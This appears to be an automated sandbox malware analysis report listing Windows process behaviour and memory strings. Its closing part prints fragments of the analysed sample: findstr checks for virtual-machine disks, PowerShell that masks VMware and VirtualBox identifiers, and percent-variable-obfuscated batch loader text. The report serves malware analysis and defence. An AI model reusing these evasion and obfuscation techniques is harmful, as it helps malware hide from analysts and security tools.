Source: C:\Windows\System32\svchost.exe TID: 7324Thread sleep time: -175000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7320Thread sleep count: 1349 > 30
Source: C:\Windows\System32\svchost.exe TID: 7320Thread sleep time: -134900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2980Thread sleep count: 175 > 30
Source: C:\Windows\System32\svchost.exe TID: 2980Thread sleep time: -175000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3232Thread sleep count: 1343 > 30
Source: C:\Windows\System32\svchost.exe TID: 3232Thread sleep time: -134300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7424Thread sleep count: 177 > 30
Source: C:\Windows\System32\svchost.exe TID: 7424Thread sleep time: -177000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3452Thread sleep count: 1341 > 30
Source: C:\Windows\System32\svchost.exe TID: 3452Thread sleep time: -134100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7432Thread sleep count: 178 > 30
Source: C:\Windows\System32\svchost.exe TID: 7432Thread sleep time: -178000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7448Thread sleep count: 1332 > 30
Source: C:\Windows\System32\svchost.exe TID: 7448Thread sleep time: -133200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7412Thread sleep count: 181 > 30
Source: C:\Windows\System32\svchost.exe TID: 7412Thread sleep time: -181000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6676Thread sleep count: 1355 > 30
Source: C:\Windows\System32\svchost.exe TID: 6676Thread sleep time: -135500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 564Thread sleep count: 176 > 30
Source: C:\Windows\System32\svchost.exe TID: 564Thread sleep time: -176000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2620Thread sleep count: 1347 > 30
Source: C:\Windows\System32\svchost.exe TID: 2620Thread sleep time: -134700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7252Thread sleep count: 180 > 30
Source: C:\Windows\System32\svchost.exe TID: 7252Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7236Thread sleep count: 1347 > 30
Source: C:\Windows\System32\svchost.exe TID: 7236Thread sleep time: -134700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1652Thread sleep count: 1345 > 30
Source: C:\Windows\System32\svchost.exe TID: 1652Thread sleep time: -134500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6496Thread sleep count: 171 > 30
Source: C:\Windows\System32\svchost.exe TID: 6496Thread sleep time: -171000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1876Thread sleep count: 170 > 30
Source: C:\Windows\System32\svchost.exe TID: 1876Thread sleep time: -170000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1180Thread sleep count: 1313 > 30
Source: C:\Windows\System32\svchost.exe TID: 1180Thread sleep time: -131300s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2936Thread sleep count: 388 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2936Thread sleep time: -38800s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7488Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3824Thread sleep count: 190 > 30
Source: C:\Windows\System32\svchost.exe TID: 3824Thread sleep time: -190000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1316Thread sleep count: 1266 > 30
Source: C:\Windows\System32\svchost.exe TID: 1316Thread sleep time: -126600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep count: 192 > 30
Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep time: -192000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2040Thread sleep count: 1357 > 30
Source: C:\Windows\System32\svchost.exe TID: 2040Thread sleep time: -135700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1860Thread sleep count: 183 > 30
Source: C:\Windows\System32\svchost.exe TID: 1860Thread sleep time: -183000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1840Thread sleep count: 1248 > 30
Source: C:\Windows\System32\svchost.exe TID: 1840Thread sleep time: -124800s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1ED894 FindFirstFileExW,15_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D21D894 FindFirstFileExW,15_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D29DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D29D894 FindFirstFileExW,15_2_000001CA7D29D894
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD5D894 FindFirstFileExW,16_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B92D894 FindFirstFileExW,17_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1CADA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CAD894 FindFirstFileExW,18_2_00000262F1CAD894
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D0D894 FindFirstFileExW,18_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1D3DA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D3D894 FindFirstFileExW,18_2_00000262F1D3D894
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001B68BD2DA18
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD2D894 FindFirstFileExW,22_2_000001B68BD2D894
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001B68BD5DA18
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD5D894 FindFirstFileExW,22_2_000001B68BD5D894
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001E591CCDA18
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CCD894 FindFirstFileExW,23_2_000001E591CCD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E13D894 FindFirstFileExW,26_2_000002234E13D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E13DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E16D894 FindFirstFileExW,26_2_000002234E16D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E16DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B1D894 FindFirstFileExW,27_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056DD894 FindFirstFileExW,28_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF0570D894 FindFirstFileExW,28_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD4D894 FindFirstFileExW,29_2_000002287AD4D894
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_000002287AD4DA18
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA9D894 FindFirstFileExW,30_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002520257DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_000002520257DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002520257D894 FindFirstFileExW,31_2_000002520257D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025AD894 FindFirstFileExW,31_2_00000252025AD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFCD894 FindFirstFileExW,32_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68D894 FindFirstFileExW,32_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EC68DA18
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BD894 FindFirstFileExW,32_2_000001A9EC6BD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EC6BDA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,33_2_0000019FF163DA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163D894 FindFirstFileExW,33_2_0000019FF163D894
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,33_2_0000019FF19ADA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19AD894 FindFirstFileExW,33_2_0000019FF19AD894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000024.00000002.3344567466.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000000.1543220583.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 00000024.00000000.1543220583.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
Source: cmd.exe, 00000016.00000003.1482211032.000001B68B78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: VMware SATA CD00
Source: svchost.exe, 0000001D.00000002.3347854568.000002287A02B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: NECVMWarVMware SATA CD00
Source: cmd.exe, 00000016.00000003.1484014593.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1484369314.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1482211032.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1487300764.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1486881918.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1484505880.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1483753694.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1485499049.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1462971364.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1483317075.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1482696640.000001B68B78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.36.drBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 00000012.00000002.3415712940.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000001A.00000002.3406455326.000002234AE79000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000024.00000000.1543789153.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.36.drBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.36.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 00000012.00000002.3415712940.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.36.drBinary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: cmd.exe, 00000016.00000003.1523180983.000001B68B796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ht%t%BxeirvhizTcyfRjSrTWsOGhCJHQOioSVlhyeAkxdxDSpSPiBMZNbBP%o%EUpCzKFsZkbhmYsfrgwTUlOSKTyocjBQtwCDPYLMyeDHnKCkiHHGFI%h%UtgwRFmqqQJkOPvPptuJvQHgEarnfuCUkKCjwshgAhONYdVNPtrolW%K%ndMZRRoYkVoOadmmsXloinbTiBeDyMdnIoxyxxBqSCXTzkcSACaucX%R%OacSRqNKAySafMGOPVwVwFpiuXyldVLJkLzxwEFlDhcybzeqmMNfYh%n%AiKUyTRBGFNiPumirkplsoDRgVTiZrhFKdkrMBgMtbBxLSJJeduDQN%Y%OlFSNCaIBoxhyLjVwPdDRqNggoljeWXEPXpZLTODLKAmZDuXAiHEzn%D%WyyyMyrQEFqSsAwkjCbzRgQAhCUoJVotfCbRAnhpmUgUWgkTAqYeCZ%O%vQHYrjEchJqXNQzFJWvLnWZVEasaNsWjQggljCVXLkMxDYsuuVGcJQ%t%MyQLtqRDpOMggHKnwhayacjCsFHXFSMTAauHvxiFfhVYKwRLKhyzcl%e%PJontOJTXwcSGgncSYYvtThlSVOVnytnRpkLsheuVljyVRQLyHoAAH%G%SWBdvxZNFzcPbrWBJKUDzhJJqafdxGjTMjwnkpMGuiFKvgQyOWYEGW%n%iKmRNusWpZpjcSUIrtXnjrCZnjkGoAHFnPbMbsCsnxSFumdXDfEEHs%l%NQhmEDkMIPrKWnRiHZRFaLzXFbgmciWdYUbkEOOYiBPdnKqPgvyFMb%F%scrkHCwXJzSoMblGDTlSxyVwJUKqgGKqqWCZTuglBkRpkZYpEASEuU%E%ETgVAMSgQcPBXPzlNjNZqmGGlKWvLGOfWwrITXTttvtOzIbiPsMIRu%t%DsnzJPQwuknKFByQsPptGVSRgDJOFsTgnCSYvtodDWajAPdzKZaWty%l%NIAvtfgcQbrhwcIzvYBmQJUIqqAjeGsWMPPkyZaiXAgZRttbRkDcvh%=o%dNRecFWYkJuuGmxbvXtopDVRXXzsTdpBFhLwGVYCaCWpxYNOtjhebSrzSagfgEehuTPyB%+%buAZRoNHGtZjLYJVkzNPlEGOTvvxOVDjonsPGfkDESmGhVvGvljubIpwOMgvSpSKQQVxF%4%UofojltsZHXaPcDLjhFXWaUZPLpZBQqZXaAWefRxVeOeiudnpYGIpAJUugyyVuRjqXcOB%Q%GHdqicRlPQuHbJCjHKxqGCYHsBAnFNksoLIrDsgxRIEpeRTKoZJnFxVeJwXGCEFbFcsqb%=%lGpDazYYIDBHPYGeXNRQEHgvzUmcCJbzDJdtuJEYXfbTvZMGZXIpBAwDzTdfmVvYBcefU%=%nKoiTTyGnZAhGcFbMXdnATAFzLbJcstVHMMmugHGXXmUDXGSQXPeaRuukIJhRPDVGFATq%'%sHFqwqCGGcBeiTfCoUPrscLxAPitrnYwMCypjOEBRNDGhcJVysrKLCYpViPHhjoseesGu%)%PtAqnAEyfpxgmUZWnLkEitaYXtIzlCcKcBJYQuxbtQQTrAVoovQthclvtBtUSfnDmNdLl%;%bgToikrDhGwytkQLJCapnFoaDjoDnGExkdnpWeZRTSlUXvzVxRCldvYwRTKYWOqAcYnpX%%APEDivvttdhKtgvdtuPfRydtaVfBLSYijYWcXHUZCcxPDoDHUwJEykfcLkDnqTIBeYBvk%$%tgLzPCObnQLryHoiuJYSUqMeHJJuVLEMixAqXeJIrbyuRVRlutKpDCpdtHSfStfClZjbg%b%XkpapATSsmLRxaCbpjFhxXqmDQXVWiSMQfwivoocwlavhnutDAWPETJZUcwzCYWjtZbsE%q%tFaVCLmWUfpvErvmciXvwnsROAypRchmbPjUVUbixcZXhdXGAWqReXhgnjgcnWfSXduPi%y%ArigPYtouKLCSOULqieHdHMOYVAXgZdJixaFiKoZNRSyuAvilhHVphfSEthUxwhvHbuuN%"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: cmd.exe, 00000016.00000003.1463561088.000001B68B7BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbAjDNbOYADmRGoSEyiVfZzHvIi=*n*g($bRzqF[2]ABubtKOUqBymcTpKfurRYKXo=*r*e*a*m*;'.ReaCeGhaeuPDheJpZpncZt=Mp (vhVnA ([*CAdgrSkxLNEyqFBRLtxHUOMiPcJxyK=rMode]::CBC;$aEQGQUIMGKLPKgVPkQbyGadzOJu=QYfY=[System.SALLUSERSPROFILE=C:\ProgramDataAOHuWQKTZqYUwIWeVwGWOOt=owTitle = $SQOAPPDATA=C:\Users\user\AppData\RoamingapsXTkpYSCOIVnMoFYWGxHQmE= aTxBAfIsVGOdEHVTCWYkzzlF=bject *S*y*s*tatYOJpyUsiWZqDvoUlLGBPMPXXh=.Replace("@", avcbAURIXVqmBJwFdHeXcInFLpzUo=*r*t]::*F*r*o*ayZzBgvqIJBHyYScQRtw=TQYfY.Padding=aZwRjOwvieKYapjWmtLhrqF= $UpD (,[strinbAUZHZfrhpmIYgzEUBKQ=($zVdEq,$ulmvtbENpfb
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000024.00000000.1546628376.000002A76A49B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: cmd.exe, 00000016.00000003.1527495754.000001B68B796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: okhiguajDXsWTiFarGnbUapNVydqvHaeHHy%D%CGgPwHaNtiPKIfhxmiIhnUtmHqKOWXopmJculQRtTnVFfOvknkNWZzkImTifWmRwTAyYdNmwr%X%ooaYOhTUzBLksqMytirHLxHwzLEpwhzYrEKlkJxMplwLflBkLzJFUOGRGEydCDxsbMTNFBoKK%X%FszaVqnjuEWyUeCYTEGlujLNeJssOEklZUpwgQKnkTiZAUgIqOMWHzqvGLWmXVvPtLzZPfRcT%d%saBbMmkCKbZSoDAETQuUyqpxsFPuhTlWJcpyPtTyLJnTwXfhYvVoxhvcKdJhxPvQQcilobPzX%C%ViPcwbuzIwMXWzCHmOLKLbWnwdtPUSXFwrBYFZoboIOtJTTCGEbndPlUmBGsIFFPygBFYDbnz%B%JvdmDECkQjpQKBHfHMesVtIcYUDsnEcCONutiHJWdiRwpZNEUArRWUEqNaoIbkWlgNcXhnWZc%q%ipMBmNZhYxMnlFTjdGhtbVSmFqCWQxGDrOOFROBnoAdNjYUhiNdHPGbmwAWVldqARjWxQosof%T%TeARfcHwuNctYOKNBiqSFclkCVacwrTvPCVCAuryozQpnhSulKogbwzRTppjbEZdTHEwThmhR%L%RDglVXudGQMcNusceJkfhxKANwGDvBdyhpjStFXsUgvOmbgnluOybbJuTGyzrRHeMoUxkAIyL%T%SkabVnMpsrbMFwgFOYNhybdzrbYgIcKLqNjRJtYsLjYAFrhROSvCVrmQhBKToFHpGqwSnoWva%M%uwpdDTZUhsQHiPZAsKhIeefBITpVpDzVaBBVXNEIKZhnRIxAxrVEOMWqqNuJEeFDSUHGoeDEf%F%zYeWSKavOyXIVgnFkEjtUdGtEuWbQmsOqypORtxdtoPGHUXOtbdztllvrKsyNZEBfjrwRzORh%x%gZFnaLJwiHPiTufmTwgaZpuKnAyDBWUnmsnlFhrYJbFrOtlOljXcHQhQEVZznfVlNCWBhUHLf%B%hrXKdVUpKrrZRGvkwGKhSLDgtDmxKGrCmWzzkgBafkCNEmVWBqKnWDnvNQqzIxEdaOMVgVapf%u%JcIiPChIqVuVdFIJdLtQbrHFzNPzaPFqvhmBFnYoiRsBkhWiemcjHzesucJcMHHAqdAVshdQN%T%eIjZgurQHvONvJVdUgCDVCAjRlgHbPWilvCQUsoHrlfmTNUuESybBnRChZiVoKPRyFCagfiBS%=*%lKxopeqMcirVHYDaJUkstHwnNokUnzKWiGbheTKeFBIGACYEwgvnqzBEnkAbTvyCyuMbWwWPkgNRZ%.%PMlpGyhewGJexTUtIkjdfigQXHakFckLJFyxpMnXqybNdWzCbwCWEOTGFusYyXytvYvRvweWWmNHg%C%sNaixijAnhVMRSUtpysaIsfAHgFsGZsamAmHrPaPoThQAfDEkCHNuGyaHAArDRUoOUzrFmczyDLOk%*%oaCDbidrFGFbmZRoJmxYTcGFmYXAioRUJQtAYNBJQWjoTptmkkPqoPqmtWrckDjqOKrvGrqVKOiWS%o%sMWFLpXyAGTzhgcwzymNTzjYXGTUUGAHutbkuwzomRnexVykoykpVjYSCXHevdEUgmfNeSccZYAbm%m%fAchIGvvkLlvjHwPuSjmsXlQKgwwhpXIXGxxFWMxizVATsVkFnFfrOTholxCjZnVOCxCjZjxgLeTb%*%LWsklQUKSqiMpjuzknilaLrUsaGdhZFKZgCoesYitlWmpQTPPXWyVIbZFxRkkQCTLyMjGfuRoaRPP%p%fFCgQojdgPreCIHAOYDIdBRdKjKDekVQlkARpduCsPEIuedwNrAbohLEOywHDGZWTBSsiPlKDbpnW%r%iIFfnPMJTCeyWdQGMYMQHPTmLoXgQxnRyHFPRBqQmmaZOTlLudRdDwptPtuZSGTvpnapybPlHVEuP%*%UyRclMMGjobrmaygqYGtEJASWntoFvIRUDUVDXGUh